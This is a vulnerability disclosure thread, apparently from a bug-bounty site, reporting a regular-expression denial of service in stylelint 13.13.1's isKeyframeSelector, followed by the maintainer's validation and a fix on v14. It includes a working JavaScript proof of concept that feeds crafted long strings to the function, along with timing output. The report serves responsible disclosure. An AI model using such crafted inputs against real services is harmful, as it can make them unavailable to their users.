Inefficient Regular Expression Complexity in stylelint/stylelint

Valid

Reported on

Oct 16th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling function isKeyframeSelector.

Proof of Concept

// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '1'.repeat(i*10000)+"a";
    isKeyframeSelector(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
Yeting Li
a month ago

Researcher


@admin, please see the security policy https://github.com/stylelint/stylelint/security/policy

We have contacted a member of the stylelint team and are waiting to hear back a month ago
stylelint/stylelint maintainer
a month ago

Maintainer


Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
a month ago

Researcher


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
a month ago

Maintainer


Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
a month ago

Researcher


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability a month ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer confirmed that a fix has been merged on 060310 a month ago
The fix bounty has been dropped